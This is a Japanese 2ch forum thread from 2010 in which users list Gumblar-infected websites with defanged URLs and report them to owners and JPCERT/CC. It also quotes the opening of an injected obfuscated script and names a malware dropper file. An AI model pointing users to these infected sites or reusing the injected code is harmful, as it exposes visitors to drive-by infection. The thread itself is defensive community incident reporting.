www●arktake●co●jp
www●acl-music●jp
メル凸しときました
株式会社アークテイクはjpnic★alpha-web.jp宛なので不安が残る…
792:名無しさん@お腹いっぱい。
10/05/16 14:54:04
acl-musicは改ざんされすぎて元がなんだったのかよくわからないな
改ざん具合からしてだいぶ放置されてるようだから大元から止めないとダメだろう
JPCERT/CCにも送っておくわ
793:名無しさん@お腹いっぱい。
10/05/16 15:24:53
>>792
ありがと
794:名無しさん@お腹いっぱい。
10/05/16 17:03:07
www●yakitori●co●jp/kor/
www●njr●or●jp/m01/07/070405-2/ ←国土交通省関連の公益法人。
Topは改ざんされていないということは、修正漏れ?それにしても公表もしていないとは。。
www●spa-marufuku●com(FRAMEリンク先 park21●wakwak●com/~marufuku/ が感染)
www●3ku●jp
www●isshu●jp/001/470/ ←Topだけ直した?配下は改ざんされたまま
www●ryo-co●net
1excellent●com
楽天市場ショップの制作から運営代行まできめ細かくサポート ホームページ制作のエクセレント
って、またここが製作したページも感染しているのか。。
フォームからも送れないし。
795:名無しさん@お腹いっぱい。
10/05/16 20:01:13
祇園大蛇山は>>791の直後に発見、メル凸も済ませてあるけど、
公開連絡窓口のアドレスが死んでたのでカイクリエイツ宛て
メールフォームあるけどaguseGWなしで感染サイトに突撃する勇気は…
【悪用厳禁】
www●marbell●jp
www●any-news●biz :「自己防衛することも重要な世の中ですね」…重要だねorz
796:名無しさん@お腹いっぱい。
10/05/16 20:23:59
> www●marbell●jp
確認できないんだけど
797:名無しさん@お腹いっぱい。
10/05/16 20:27:52
>>796
gredで覗いてみて
798:名無しさん@お腹いっぱい。
10/05/16 22:06:28
www●acl-music●jp
改竄コードの見本市のようだw
799:コテハン ◆8080adndqg
10/05/17 10:40:29
【陥落サイトのURL悪用厳禁】
www●children-nepal●net/suryamukhi/handpuppets-j/woodenheadhandpuppets/home●htm
www●3ku●jp/grow_images/2005/june/index_2005june●html ←途中切れ
www●k3●dion●ne●jp/~sym1909 ←途中切れ
www●arktake●co●jp/
www●ryo-co●net/index●html
www●njr●or●jp/m01/07/070706/index●html ←←←
1excellent●com ←←←←ホームページ制作のエクセレント
800:名無しさん@お腹いっぱい。
10/05/17 11:41:02
URLリンク(blogs.yahoo.co.jp)
> 「wwwzuc32.exe」というキーワードでググってみたら、ここ最近
> (先週から?)の「Gumblar.8080」の改ざん攻撃を受けたページの閲覧で
> 発動・感染することになるファイル名のようですな。
へぇー。
801:名無しさん@お腹いっぱい。
10/05/17 13:00:34
>>799
> www●k3●dion●ne●jp/~sym1909
・hpbmapscript3.js
URLリンク(a001.aguse.jp)
メル凸しときました
【悪用厳禁】
www●kokushiad●jp :Gumblarが入学したようですorz
URLリンク(www.dan.co.uk)
802:名無しさん@お腹いっぱい。
10/05/17 13:17:16
ってあれ、国士舘のURLってwww●kokushikan●ac●jpだな
…じゃあここは何?
803:名無しさん@お腹いっぱい。
10/05/17 13:30:33
ぐぐったら入試課のものらしい
受験生向けっぽい
804:名無しさん@お腹いっぱい。
10/05/17 13:31:15
まちがえた
入学課だった
805:名無しさん@お腹いっぱい。
10/05/17 13:37:46
取扱注意
www●fuchucci●or●jp
府中商工会議所
806:名無しさん@お腹いっぱい。
10/05/17 14:07:16
>>803
ありがと、URL分けてるのね
そういうことならJPCERTにも報告しておきます
>>805
メールで凸っときました
807:名無しさん@お腹いっぱい。
10/05/17 17:20:27
本当、日本は餌食ですなぁ。
一般ユーザーは自動更新ガン無視、未だにIEは6。
web屋はアップデートすると業務に支障きたすとか言ってノーガード。
808:名無しさん@お腹いっぱい。
10/05/17 19:53:46
URLリンク(headlines.yahoo.co.jp)
>世界ブラウザ市場で、IE6は17.58%のシェアを持ち、2位に付けている
何も日本に限ったことではなさそうな…って2位かよ
809:名無しさん@お腹いっぱい。
10/05/17 20:28:21
IE7人気ないんだなあ…
810:名無しさん@お腹いっぱい。
10/05/17 20:47:45
IE7にしがみつく理由が何一つ無いからねぇ。
2000とかMeとか→IE6で終わり
XPとかVistaとか→IE8にできる
811:名無しさん@お腹いっぱい。
10/05/17 21:00:03
>>810
そうでもないぞ
低スペックPCではIE7の方が8より軽い
812:名無しさん@お腹いっぱい。
10/05/17 21:24:20
IE8で増えた余計な機能(Webスライスやアクセラレータ)切れば変わらん、むしろ快適。
813:名無しさん@お腹いっぱい。
10/05/17 21:39:18
2000とかもうサポート終わるOSをネットに繋ぐとか信じられん
814:名無しさん@お腹いっぱい。
10/05/17 21:43:29
こないだ母校の高校行ったらまだ2000使ってたしセキュリティソフト何も入ってなかった
815:名無しさん@お腹いっぱい。
10/05/17 21:54:41
会社出使ってるN○Cのグループウェアが、対応ブラウザIE6のみとか寝言ほざいてるな
ActiveX使いまくりで、Firefox、Chrome等当然未対応
AD環境だったから、導入時にいちいちAdministrators権限持ちのユーザで
モジュール毎にActiveX入れて回らなければならないとか糞だった
しかも、よくわかってないのか
「スクリプトを実行しても安全だとマークされていないActiveX~~」にチェックつけろとか
インストール手順書が回ってくるし
こういう連中がGumblar流行の助長してるんだろうな
816:名無しさん@お腹いっぱい。
10/05/17 22:42:49
OSがくそなだけ
817:名無しさん@お腹いっぱい。
10/05/17 23:46:29
などと意味不明の供述を繰り返しており
818:名無しさん@お腹いっぱい。
10/05/18 00:02:08
実は意味がある言葉である。
819:名無しさん@お腹いっぱい。
10/05/18 01:08:16
>>815
もちろんIE6はそのグループウェア専用にしてるんだよね?
普段はFirefoxxやOperaでYahooとか見てるんだよね?
820:名無しさん@お腹いっぱい。
10/05/18 01:14:49
IE6のモジュールがあるだけで脆弱(ry
821:名無しさん@お腹いっぱい。
10/05/18 01:50:27
奥の手はあるけど現実的じゃないからなー
URLリンク(blog.livedoor.jp)
822:名無しさん@お腹いっぱい。
10/05/18 13:37:37
テンプレ案、詰めなくていいの?
何を残すとか何を削るとか毎度揉めてるみたいだけど
823:名無しさん@お腹いっぱい。
10/05/18 13:52:15
揉めるから敢えて触れなかったのに
824:名無しさん@お腹いっぱい。
10/05/18 14:27:57
今なら>>2のAdobe Readerの推奨設定にLaunch Actionやマルチメディア操作の無効化を
URLリンク(www.so-net.ne.jp)
ここのとかまるまるコピペで加えるだけでいいんじゃないかな。
825:名無しさん@お腹いっぱい。
10/05/18 14:46:17
>>768
ケイダッシュのホスティングしてる大塚商会も問題有りだな。
気休めにこれぐらいしてやったらいいのに。
<Limit ALL>
Order Allow,Deny
Allow from alpha-prm.jp
Deny from all
</Limit>
826:名無しさん@お腹いっぱい。
10/05/18 16:32:01
刃物に注意
www●hamonoichiba●com
金券ショップも注意
www●access-ticket●com
改ざんされてる通販サイトは廃業しろよ…
827:名無しさん@お腹いっぱい。
10/05/18 17:59:53
www●access-ticket●com
828:名無しさん@お腹いっぱい。
10/05/18 18:13:27
www●access-ticket●comの社長のtwitter
URLリンク(twitter)●com/access_kun
@2ちゃんって何?
ネラーなの?
829:名無しさん@お腹いっぱい。
10/05/18 19:11:39
>>828
このクズにサイトがウイルスばらまいてるって教えてやれよ
830:名無しさん@お腹いっぱい。
10/05/18 19:23:27
>>826
確認出来ない
831:名無しさん@お腹いっぱい。
10/05/18 19:29:26
キッティング屋だけど
地方自治体、政府関係あたりは特に
WindowsUpdateの警告出すな
ウィルス対策ソフトの警告出すな
Adobe ReaderやFlash、JREが勝手にアップデートして
システムが動かなくなったらどうするんだ
自動アップデート切れとか言ってくる
自治体や政府こそ危ない
これが日本政府の現実
832:名無しさん@お腹いっぱい。
10/05/18 19:29:33
>>826-828
Gumblar/8080 Not Found.
おい。
833:名無しさん@お腹いっぱい。
10/05/18 19:48:59
ここで晒された嫌がらせかもしれない
スレリンク(news板:168-182番)
834:名無しさん@お腹いっぱい。
10/05/18 19:49:41
>>832
修正されたようだな
17:44の時点ではJSの中にあった
835:名無しさん@お腹いっぱい。
10/05/18 20:08:43
>>826
www●hamonoichiba●com
確認の後電凸完了
www●access-ticket●com
確認の後電凸完了
ここは、別の方が12時頃に電凸があったと言っていた
サーバー会社とHP作成会社に調査依頼をかけた結果が
たた今届き、15日に改竄があったとのこと
836:名無しさん@お腹いっぱい。
10/05/18 20:25:32
>>835
電凸乙
837:名無しさん@お腹いっぱい。
10/05/18 20:27:29
>>831
てっぺんからしてこんなんだから
そりゃ自衛隊の情報流出も起きるわ
嗚呼F-22配備の夢……
838:名無しさん@お腹いっぱい。
10/05/18 20:30:00
>>837
それは別の問題だろ
839:名無しさん@お腹いっぱい。
10/05/18 20:46:46
F-22配備するくらいならその金でOS入れ替えたりセキュリティソフト入れたりIE他をアップデートした方がよっぽど防衛力上がりそう
840:名無しさん@お腹いっぱい。
10/05/18 21:13:23
【悪用厳禁】
www●crossmarin●net :またWEB屋かorz
841:名無しさん@お腹いっぱい。
10/05/18 21:51:36
>>840
電凸完了
こんな時間に電話をかけてくるのは失礼でしょう、だとw
だがしかし、伝える事はつたえた
理解したかは知らん
サーバー会社と私が悪者らしいw
アホや
842:名無しさん@お腹いっぱい。
10/05/18 22:07:28
>>841
お疲れ様でした
メンテに変わりました
843:名無しさん@お腹いっぱい。
10/05/18 22:31:55
NASサーバー/ファイルサーバーの奨め
www●nas-server●info/
ここも感染してる?
844:名無しさん@お腹いっぱい。
10/05/18 22:37:08
>>843
してる
845:名無しさん@お腹いっぱい。
10/05/18 22:44:36
>>844
サンクス
モロゾフ以来に久しぶりに踏んだよ
846:名無しさん@お腹いっぱい。
10/05/18 22:45:31
さっきMSEが"VirTool:JS/Obfuscator.M"検出したけどGumblar?
検索しても英語ばかりで詳細分からなかった
847:名無しさん@お腹いっぱい。
10/05/18 22:47:16
>>843
URLリンク(www.virustotal.com)
URLリンク(www.aguse.jp)
[Gumblarの可能性あり]
848:名無しさん@お腹いっぱい。
10/05/18 23:05:12
ubuntunの俺は問題ない
高みのけんぶつだわ
849:名無しさん@お腹いっぱい。
10/05/18 23:05:57
:8080/が無い最新型を探してるんだが・・
み つ か ら な い o r z
850:名無しさん@お腹いっぱい。
10/05/18 23:28:34
>>843
ここは鑑定スレじゃない事を忘れずに
>>848
誰がうまいこと言えと
851:コテハン ◆8080adndqg
10/05/18 23:32:58
【陥落サイトのURL悪用厳禁】
www●ryu1●co●jp/
www●ftagent●jp ←傑作w
↓
><p>現在、本サイトはメンテナンスを行っております</p>
><p>改めてアクセスをお願いいたします </p>
<script>KO={x:false};this.RO=・・・
www●any-news●biz/ ←Web・インターネット・SEO系ニュース
852:名無しさん@お腹いっぱい。
10/05/18 23:38:09
>>843-847
(略).info/info/2010/05/post_2.php
>パソコンが不調です。
>私のもいまいち動きが鈍いですが、同僚さんのPCがついに壊れてしまいました。
>うんともすんとも言わない状況。
これはひょっとして笑うところか?
853:843
10/05/18 23:39:51
>>850
すまんかった
以後気をつける
854:名無しさん@お腹いっぱい。
10/05/18 23:40:50
server●crossmarin●net :found
→ www●crossmarin●net :found
→ temp●crossmarin●net :found
→ han●crossmarin●net :found
どうにもならねえやwww
855:名無しさん@お腹いっぱい。
10/05/18 23:42:45
>>852
>PCがついに壊れてしまいました
windowsが起動しないだけってオチカ?
856:名無しさん@お腹いっぱい。
10/05/18 23:47:18
って、>>841がわざわざ電凸してくれてるー!
申し訳ない、厭な思いをさせちゃったうえにこんな結果だったみたいだ…
857:815
10/05/19 00:23:34
ここまで来ると笑いが止まらんwwww
感染者発生wwww
あばばばば
>>819
おじさん連中はみんな、ブラウザ=IEと思ってるよ
俺は余裕でIE8ぶっこんだ
普通に動いたんだけどね
858:名無しさん@お腹いっぱい。
10/05/19 00:42:55
>>857
Nのグループウエアって星の事務所かな?
最新版は、IE8も桶だね。
でも簡単にバージョンアップできるものでもないけどね。
カスタマイズしてたら特にね。
859:名無しさん@お腹いっぱい。
10/05/19 00:45:58
脅し?
101 :名無しさん@ビンキー:2010/05/19(水) 00:25:11 0
>>96
ウナちゃんもこのままだと同じ末路になる
URLリンク(www.nas-server.info)
ひでぇと思ったwwwwwwwwwwwwwwww
189 :斎藤智成 ◆LIuJMgzRRY :2010/05/19(水) 00:43:51 0
そろそろネタ晴らし(てかさっきからしてるのに誰も気づかない馬鹿ばかりなので)
>>101は俺でした。そして最新の危険ウィルスだから検知できないよ。
嘘だと思ったらURLをぐぐってみろ
まーそんなわけでコンビニいく
帰ってきたら生放送するから
サイちゃんでタグ検索してね
860:858
10/05/19 00:48:28
>>831
>自動アップデート切れとか言ってくる
うちの会社もアップデートきってる。
ユーザからソフトのインストール権限奪ってるし、Adminでは、プロキシ設定をわざとしていないから
自動アップデートが動いてもダウンロードできないから。
ちなみにIEは6。親会社のシステムがIE6でないといけないから。7と8はダメとなっているから。
861:名無しさん@お腹いっぱい。
10/05/19 00:50:45
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
862:名無しさん@お腹いっぱい。
10/05/19 00:51:05
nas-server●info/
avast!対応はやっっ
863:名無しさん@お腹いっぱい。
10/05/19 08:03:48
>>862
そこはここに出る前から対応してた(JS:Illredir-BU,5/14に対応)
昨日検知しなかった奴も検体送っといたら今日の分(JS:Illredir-BX,5/18の2本目)で対応してくれた
ありがたやありがたや
864:名無しさん@お腹いっぱい。
10/05/19 11:49:52
やっぱりOSやブラウザ、セキュリティソフトみたいな重要なものは強制アップデートすべきだな
MSはWindows8からは自動更新は強制アップデートしろ
でもってサポ切れOSはネット繋げなくなるようにしてしまえばいい
865:名無しさん@お腹いっぱい。
10/05/19 12:49:01
んなことしたら企業向けには売れないOSになるな
大半の企業は8をパスして7のProかEnterpriseを2020年まで使うことになるだろう
866:名無しさん@お腹いっぱい。
10/05/19 13:03:48
アメリカの公的機関のドメインの.govはマカフィーの安全なドメイン調査で一位だったけど
やっぱり向こうはちゃんと対策してて絶対安全くらいのレベルなのかな?
日本は公的機関も普通に陥落してるが
867:名無しさん@お腹いっぱい。
10/05/19 13:35:42
そりゃ日本は政府関係のPCにWin使ってる間抜けだからなあ
868:コテハン ◆8080adndqg
10/05/19 13:46:12
【陥落サイトのURL悪用厳禁】
maillady●hirotu●net/
suncs●sakura●ne●jp/ ←吹いたw
tengas155●coreserver●jp/
869:名無しさん@お腹いっぱい。
10/05/19 14:04:07
>>867
OS云々より教育をしてないからだな
P2P使うバカも後を絶たないし
870:名無しさん@お腹いっぱい。
10/05/19 14:07:54
> tengas155●coreserver●jp/
?
871:名無しさん@お腹いっぱい。
10/05/19 14:18:10
どうやって見つけてきてるの?
872:名無しさん@お腹いっぱい。
10/05/19 15:41:30
五感をフルに働かせて
873:コテハン ◆8080adndqg
10/05/19 16:23:37
>>870
●が家出してたorz
tenga●s155●coreserver●jp/
874:名無しさん@お腹いっぱい。
10/05/19 20:48:14
Gumblar被害も10分以内に把握、at+linkが「改竄チェッカー」提供
URLリンク(internet.watch.impress.co.jp)
改竄チェッカー
URLリンク(www.at-link.ad.jp)
たけーよ
875:名無しさん@お腹いっぱい。
10/05/19 21:25:10
www●biz-x●jp ←ここに申告ができない
diet-sango●jp/info/
tw13●net